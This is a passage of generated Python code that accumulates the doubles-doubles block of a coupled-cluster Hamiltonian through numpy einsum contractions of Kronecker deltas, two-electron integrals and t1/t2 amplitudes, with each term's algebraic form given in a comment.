Hdd += 1.000000000000000 * einsum('ea,nj,ifbm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(n,j)*d(m,i)*<e,f||a,b>
Hdd += 1.000000000000000 * einsum('nj,mi,efab->efmnabij', kd[o, o], kd[o, o], g[v, v, v, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(m,j)*d(n,i)*<e,f||a,b>
Hdd += -1.000000000000000 * einsum('mj,ni,efab->efmnabij', kd[o, o], kd[o, o], g[v, v, v, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,n>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,mi,jkcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,n>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ikcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,n>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,mi,jkcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,n>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ikcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 P(m,n)d(e,a)*d(f,b)*<i,j||c,n>*t1(c,m)
contracted_intermediate = 1.000000000000000 * einsum('ea,fb,ijcn,cm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->efnmabij', contracted_intermediate)
# -1.0000 P(m,n)d(f,a)*d(e,b)*<i,j||c,n>*t1(c,m)
contracted_intermediate = -1.000000000000000 * einsum('fa,eb,ijcn,cm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->efnmabij', contracted_intermediate)
# -1.0000 d(f,b)*d(m,i)*<j,k||a,n>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,mi,jkan,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*<i,k||a,n>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mj,ikan,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*<j,k||b,n>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,mi,jkbn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*<i,k||b,n>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mj,ikbn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(m,i)*<j,k||a,n>*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,mi,jkan,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,k||a,n>*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mj,ikan,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,k||b,n>*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,mi,jkbn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*<i,k||b,n>*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mj,ikbn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,m>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,ni,jkcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,m>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,ikcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,m>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,ni,jkcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,m>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,ikcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,i)*<j,k||a,m>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,ni,jkam,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*<i,k||a,m>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,nj,ikam,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*<j,k||b,m>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,ni,jkbm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*<i,k||b,m>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,nj,ikbm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,i)*<j,k||a,m>*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,ni,jkam,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*<i,k||a,m>*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,nj,ikam,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*<j,k||b,m>*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,ni,jkbm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*<i,k||b,m>*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,nj,ikbm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*<k,e||c,a>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,keca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*<k,e||c,a>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,keca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*<k,e||c,b>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,kecb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*<k,e||c,b>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,kecb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,i)*<j,e||c,a>*t1(c,n)
Hdd += -1.000000000000000 * einsum('fb,mi,jeca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*<i,e||c,a>*t1(c,n)
Hdd += 1.000000000000000 * einsum('fb,mj,ieca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*<j,e||c,b>*t1(c,n)
Hdd += 1.000000000000000 * einsum('fa,mi,jecb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*<i,e||c,b>*t1(c,n)
Hdd += -1.000000000000000 * einsum('fa,mj,iecb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,i)*<j,e||c,a>*t1(c,m)
Hdd += 1.000000000000000 * einsum('fb,ni,jeca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*<i,e||c,a>*t1(c,m)
Hdd += -1.000000000000000 * einsum('fb,nj,ieca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*<j,e||c,b>*t1(c,m)
Hdd += -1.000000000000000 * einsum('fa,ni,jecb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*<i,e||c,b>*t1(c,m)
Hdd += 1.000000000000000 * einsum('fa,nj,iecb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(e,f)d(n,j)*d(m,i)*<k,e||a,b>*t1(f,k)
contracted_intermediate = 1.000000000000000 * einsum('nj,mi,keab,fk->efmnabij', kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->femnabij', contracted_intermediate)
# -1.0000 P(e,f)d(m,j)*d(n,i)*<k,e||a,b>*t1(f,k)
contracted_intermediate = -1.000000000000000 * einsum('mj,ni,keab,fk->efmnabij', kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->femnabij', contracted_intermediate)
# -1.0000 d(e,b)*d(n,j)*d(m,i)*<k,f||c,a>*t1(c,k)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,kfca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*<k,f||c,a>*t1(c,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,kfca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*<k,f||c,b>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,kfcb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*<k,f||c,b>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,kfcb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(m,i)*<j,f||c,a>*t1(c,n)
Hdd += 1.000000000000000 * einsum('eb,mi,jfca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,f||c,a>*t1(c,n)
Hdd += -1.000000000000000 * einsum('eb,mj,ifca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,f||c,b>*t1(c,n)
Hdd += -1.000000000000000 * einsum('ea,mi,jfcb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*<i,f||c,b>*t1(c,n)
Hdd += 1.000000000000000 * einsum('ea,mj,ifcb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,i)*<j,f||c,a>*t1(c,m)
Hdd += -1.000000000000000 * einsum('eb,ni,jfca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*<i,f||c,a>*t1(c,m)
Hdd += 1.000000000000000 * einsum('eb,nj,ifca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*<j,f||c,b>*t1(c,m)
Hdd += 1.000000000000000 * einsum('ea,ni,jfcb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*<i,f||c,b>*t1(c,m)
Hdd += -1.000000000000000 * einsum('ea,nj,ifcb,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.2500 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += 0.250000000000000 * einsum('ea,fb,nj,mi,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.2500 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += -0.250000000000000 * einsum('ea,fb,mj,ni,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.2500 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += -0.250000000000000 * einsum('fa,eb,nj,mi,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# 0.2500 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||c,d>*t2(c,d,l,k)
Hdd += 0.250000000000000 * einsum('fa,eb,mj,ni,lkcd,cdlk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,d>*t2(c,d,n,k)
Hdd += -0.500000000000000 * einsum('ea,fb,mi,jkcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,d>*t2(c,d,n,k)
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ikcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,d>*t2(c,d,n,k)
Hdd += 0.500000000000000 * einsum('fa,eb,mi,jkcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,d>*t2(c,d,n,k)
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ikcd,cdnk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,d>*t2(c,d,m,k)
Hdd += 0.500000000000000 * einsum('ea,fb,ni,jkcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,d>*t2(c,d,m,k)
Hdd += -0.500000000000000 * einsum('ea,fb,nj,ikcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,d>*t2(c,d,m,k)
Hdd += -0.500000000000000 * einsum('fa,eb,ni,jkcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,d>*t2(c,d,m,k)
Hdd += 0.500000000000000 * einsum('fa,eb,nj,ikcd,cdmk->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*<i,j||c,d>*t2(c,d,m,n)
Hdd += 0.500000000000000 * einsum('ea,fb,ijcd,cdmn->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*<i,j||c,d>*t2(c,d,m,n)
Hdd += -0.500000000000000 * einsum('fa,eb,ijcd,cdmn->efmnabij', kd[v, v], kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,b)*d(n,j)*d(m,i)*<l,k||c,a>*t2(c,e,l,k)
Hdd += -0.500000000000000 * einsum('fb,nj,mi,lkca,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,b)*d(m,j)*d(n,i)*<l,k||c,a>*t2(c,e,l,k)
Hdd += 0.500000000000000 * einsum('fb,mj,ni,lkca,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(n,j)*d(m,i)*<l,k||c,b>*t2(c,e,l,k)
Hdd += 0.500000000000000 * einsum('fa,nj,mi,lkcb,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,j)*d(n,i)*<l,k||c,b>*t2(c,e,l,k)
Hdd += -0.500000000000000 * einsum('fa,mj,ni,lkcb,celk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,i)*<j,k||c,a>*t2(c,e,n,k)
Hdd += 1.000000000000000 * einsum('fb,mi,jkca,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*<i,k||c,a>*t2(c,e,n,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ikca,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,k||c,b>*t2(c,e,n,k)
Hdd += -1.000000000000000 * einsum('fa,mi,jkcb,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*<i,k||c,b>*t2(c,e,n,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ikcb,cenk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,i)*<j,k||c,a>*t2(c,e,m,k)
Hdd += -1.000000000000000 * einsum('fb,ni,jkca,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*<i,k||c,a>*t2(c,e,m,k)
Hdd += 1.000000000000000 * einsum('fb,nj,ikca,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,k||c,b>*t2(c,e,m,k)
Hdd += 1.000000000000000 * einsum('fa,ni,jkcb,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*<i,k||c,b>*t2(c,e,m,k)
Hdd += -1.000000000000000 * einsum('fa,nj,ikcb,cemk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*<i,j||c,a>*t2(c,e,m,n)
Hdd += -1.000000000000000 * einsum('fb,ijca,cemn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(f,a)*<i,j||c,b>*t2(c,e,m,n)
Hdd += 1.000000000000000 * einsum('fa,ijcb,cemn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(e,b)*d(n,j)*d(m,i)*<l,k||c,a>*t2(c,f,l,k)
Hdd += 0.500000000000000 * einsum('eb,nj,mi,lkca,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,b)*d(m,j)*d(n,i)*<l,k||c,a>*t2(c,f,l,k)
Hdd += -0.500000000000000 * einsum('eb,mj,ni,lkca,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,j)*d(m,i)*<l,k||c,b>*t2(c,f,l,k)
Hdd += -0.500000000000000 * einsum('ea,nj,mi,lkcb,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(m,j)*d(n,i)*<l,k||c,b>*t2(c,f,l,k)
Hdd += 0.500000000000000 * einsum('ea,mj,ni,lkcb,cflk->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t2(c,f,n,k)
Hdd += -1.000000000000000 * einsum('eb,mi,jkca,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t2(c,f,n,k)
Hdd += 1.000000000000000 * einsum('eb,mj,ikca,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t2(c,f,n,k)
Hdd += 1.000000000000000 * einsum('ea,mi,jkcb,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t2(c,f,n,k)
Hdd += -1.000000000000000 * einsum('ea,mj,ikcb,cfnk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,i)*<j,k||c,a>*t2(c,f,m,k)
Hdd += 1.000000000000000 * einsum('eb,ni,jkca,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*<i,k||c,a>*t2(c,f,m,k)
Hdd += -1.000000000000000 * einsum('eb,nj,ikca,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,k||c,b>*t2(c,f,m,k)
Hdd += -1.000000000000000 * einsum('ea,ni,jkcb,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*<i,k||c,b>*t2(c,f,m,k)
Hdd += 1.000000000000000 * einsum('ea,nj,ikcb,cfmk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*<i,j||c,a>*t2(c,f,m,n)
Hdd += 1.000000000000000 * einsum('eb,ijca,cfmn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||c,b>*t2(c,f,m,n)
Hdd += -1.000000000000000 * einsum('ea,ijcb,cfmn->efmnabij', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(n,j)*d(m,i)*<l,k||a,b>*t2(e,f,l,k)
Hdd += 0.500000000000000 * einsum('nj,mi,lkab,eflk->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(m,j)*d(n,i)*<l,k||a,b>*t2(e,f,l,k)
Hdd += -0.500000000000000 * einsum('mj,ni,lkab,eflk->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(m,i)*<j,k||a,b>*t2(e,f,n,k)
Hdd += -1.000000000000000 * einsum('mi,jkab,efnk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,j)*<i,k||a,b>*t2(e,f,n,k)
Hdd += 1.000000000000000 * einsum('mj,ikab,efnk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(n,i)*<j,k||a,b>*t2(e,f,m,k)
Hdd += 1.000000000000000 * einsum('ni,jkab,efmk->efmnabij', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
